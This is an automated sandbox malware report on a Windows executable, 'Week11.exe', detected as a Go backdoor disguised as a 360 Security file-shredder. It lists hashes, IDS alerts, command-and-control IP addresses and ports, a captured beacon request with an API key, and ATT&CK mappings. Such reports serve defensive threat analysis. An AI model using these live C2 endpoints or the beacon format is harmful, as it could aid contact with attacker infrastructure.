Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Week11.exe

Overview

General Information

Sample name:Week11.exe
Analysis ID:1553838
MD5:4fbc4f26e90324c3b535943452460761
SHA1:032f96166bb573c9029f65aefb91d22b8a4940ed
SHA256:82e9465d41073e2678135009e179de5a0d0973bf439f6cac53db9b9f45130148
Infos:

Detection

GO Backdoor
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found Tor onion address
Detected TCP or UDP traffic on non-standard ports
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files

Classification

  • System is w10x64
  • Week11.exe (PID: 2172 cmdline: "C:\Users\user\Desktop\Week11.exe" MD5: 4FBC4F26E90324C3B535943452460761)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: Week11.exe PID: 2172JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-11T17:57:30.483613+010020229301A Network Trojan was detected172.202.163.200443192.168.2.549716TCP
    2024-11-11T17:57:58.288467+010020229301A Network Trojan was detected172.202.163.200443192.168.2.557077TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-11T17:57:20.154104+010028555361A Network Trojan was detected192.168.2.54970994.103.88.12728670TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-11T17:57:49.549151+010028555371A Network Trojan was detected192.168.2.54970994.103.88.12728670TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-11T17:57:49.784386+010028555381A Network Trojan was detected94.103.88.12728670192.168.2.549709TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-11-11T17:57:20.153843+010028555391A Network Trojan was detected94.103.88.12728670192.168.2.549709TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Week11.exeReversingLabs: Detection: 54%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
    Source: Week11.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Week11.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\vmagent_new\bin\joblist\498883\out\Release\QHFileSmasher.pdb source: Week11.exe

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 94.103.88.127:28670 -> 192.168.2.5:49709
    Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.5:49709 -> 94.103.88.127:28670
    Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.5:49709 -> 94.103.88.127:28670
    Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 94.103.88.127:28670 -> 192.168.2.5:49709
    Source: global trafficTCP traffic: 94.103.88.127 ports 0,2,28670,6,7,8
    Source: Week11.exe, 00000000.00000002.3327493702.0000000003280000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: Week11.exe, 00000000.00000002.3327136385.0000000002B40000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectutf-8''charsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp
    Source: global trafficTCP traffic: 192.168.2.5:49709 -> 94.103.88.127:28670
    Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
    Source: Joe Sandbox ViewIP Address: 188.130.206.243 188.130.206.243
    Source: Joe Sandbox ViewIP Address: 93.185.159.253 93.185.159.253
    Source: Joe Sandbox ViewASN Name: VDSINA-ASRU VDSINA-ASRU
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:49716
    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.5:57077
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
    Source: unknownTCP traffic detected without corresponding DNS query: 93.185.159.253
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownTCP traffic detected without corresponding DNS query: 94.103.88.127
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 198X-Api-Key: IvkcbsG4Accept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C526000.00000004.00001000.00020000.00000000.sdmp, Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C526000.00000004.00001000.00020000.00000000.sdmp, Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243http://46.8.232.106
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C526000.00000004.00001000.00020000.00000000.sdmp, Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253
    Source: Week11.exeString found in binary or memory: http://s.360safe.com/safei18n/
    Source: Week11.exeString found in binary or memory: http://www.360totalsecurity.com/d/ts/%s/%s/channelOpen
    Source: shared.xmlString found in binary or memory: https://store.360totalsecurity.com/
    Source: Week11.exeStatic PE information: Resource name: UIDATA type: Zip archive data, at least v1.0 to extract, compression method=store
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C538000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe
    Source: Week11.exe, 00000000.00000002.3328025723.000000000C4C2000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C52C000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe
    Source: Week11.exe, 00000000.00000002.3328802961.000000000C54B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQHFileSmasher.exeR vs Week11.exe
    Source: Week11.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal76.troj.evad.winEXE@1/1@0/6
    Source: C:\Users\user\Desktop\Week11.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
    Source: Week11.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Week11.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Week11.exeReversingLabs: Detection: 54%
    Source: C:\Users\user\Desktop\Week11.exeFile read: C:\Users\user\Desktop\Week11.exeJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: wtsapi32.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: k7rn7l32.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: ntd3ll.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\Week11.exeSection loaded: mswsock.dllJump to behavior
    Source: Week11.exeStatic file information: File size 8848896 > 1048576
    Source: Week11.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x790e00
    Source: Week11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: Week11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: Week11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: Week11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Week11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: Week11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: Week11.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Week11.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\vmagent_new\bin\joblist\498883\out\Release\QHFileSmasher.pdb source: Week11.exe
    Source: Week11.exeStatic PE information: real checksum: 0x128f7b should be: 0x870d47
    Source: C:\Users\user\Desktop\Week11.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
    Source: Week11.exeBinary or memory string: [TOOUGPQFNQM@CQSEDBGIOOTDQVGOPLABPQGF@BQROTESTBIVJGEWVA@FCPFRTESUCKTHEGUT@AGEVMCIESUCKTHEGUTCAGEVMMZXSUCJVJGDVW@AFDPKJRQNUCKTHEFTUBCEGTOOTDFHCKTJGDVVFF@ARHG]LYJ^KTHEFTUCBDFVLLWAVSfVTHEFVVA@FCPKJRB[]JdIHEFTT@@FDWKJQ@USDCcUEFTW@AGEWLLPAWQFMSwXFTUBCEGTMMVGQQGOPM
    Source: Week11.exeBinary or memory string: [TOOUGPQFNQM@CQSEDBGIOOTDQVGOPLABPQGF@BQROTESTBIVJGEWVA@FCPFRTESUCKTHEGUT@AGEVMCIESUCKTHEGUTCAGEVMMZXSUCJVJGDVW@AFDPKJRQNUCKTHEFTUBCEGTOOTDFHCKTJGDVVFF@ARHG]LYJ^KTHEFTUCBDFVLLWAVSfVTHEFVVA@FCPKJRB[]JdIHEFTT@@FDWKJQ@USDCcUEFTW@AGEWLLPAWQFMSwXFTUBCEGTMMVGQQGOPM[TUBBDEVMMWFPVGOQNC
    Source: Week11.exe, 00000000.00000002.3327018030.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
    Source: C:\Users\user\Desktop\Week11.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: Week11.exe PID: 2172, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: Week11.exe PID: 2172, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading
    1
    DLL Side-Loading
    1
    Masquerading
    OS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local System1
    Non-Standard Port
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    DLL Side-Loading
    LSASS Memory11
    System Information Discovery
    Remote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
    Proxy
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Week11.exe54%ReversingLabsWin32.Infostealer.Tinba
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://188.130.206.2430%Avira URL Cloudsafe
    http://188.130.206.243/0%Avira URL Cloudsafe
    http://188.130.206.243http://46.8.232.1060%Avira URL Cloudsafe
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://46.8.232.106/false
      high
      http://46.8.236.61/false
        high
        http://93.185.159.253/false
          high
          http://188.130.206.243/false
          • Avira URL Cloud: safe
          unknown
          http://91.212.166.91/false
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://46.8.232.106Week11.exe, 00000000.00000002.3328802961.000000000C526000.00000004.00001000.00020000.00000000.sdmp, Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmpfalse
              high
              http://188.130.206.243http://46.8.232.106Week11.exe, 00000000.00000002.3328802961.000000000C526000.00000004.00001000.00020000.00000000.sdmp, Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://188.130.206.243Week11.exe, 00000000.00000002.3328802961.000000000C526000.00000004.00001000.00020000.00000000.sdmp, Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://93.185.159.253Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmpfalse
                high
                http://46.8.236.61Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmpfalse
                  high
                  http://www.360totalsecurity.com/d/ts/%s/%s/channelOpenWeek11.exefalse
                    high
                    http://s.360safe.com/safei18n/Week11.exefalse
                      high
                      http://91.212.166.91Week11.exe, 00000000.00000002.3328802961.000000000C524000.00000004.00001000.00020000.00000000.sdmpfalse
                        high
                        https://store.360totalsecurity.com/shared.xmlfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          46.8.232.106
                          unknownRussian Federation
                          28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                          188.130.206.243
                          unknownRussian Federation
                          200509SVINT-ASNESfalse
                          94.103.88.127
                          unknownRussian Federation
                          48282VDSINA-ASRUtrue
                          93.185.159.253
                          unknownRussian Federation
                          39912I3B-ASATfalse
                          91.212.166.91
                          unknownUnited Kingdom
                          35819MOBILY-ASEtihadEtisalatCompanyMobilySAfalse
                          46.8.236.61
                          unknownRussian Federation
                          28917FIORD-ASIP-transitoperatorinRussiaUkraineandBalticsfalse
                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1553838
                          Start date and time:2024-11-11 17:56:20 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 4m 33s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:4
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:Week11.exe
                          Detection:MAL
                          Classification:mal76.troj.evad.winEXE@1/1@0/6
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • VT rate limit hit for: Week11.exe
                          No simulations
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          46.8.232.106m0Yc9KltGw.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          SecuriteInfo.com.FileRepMalware.7838.24766.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          BwqqVoHR71.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          sV9ElC4fU4.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
                          antispam_connect1.exeGet hashmaliciousGO BackdoorBrowse
                          • 46.8.232.106/
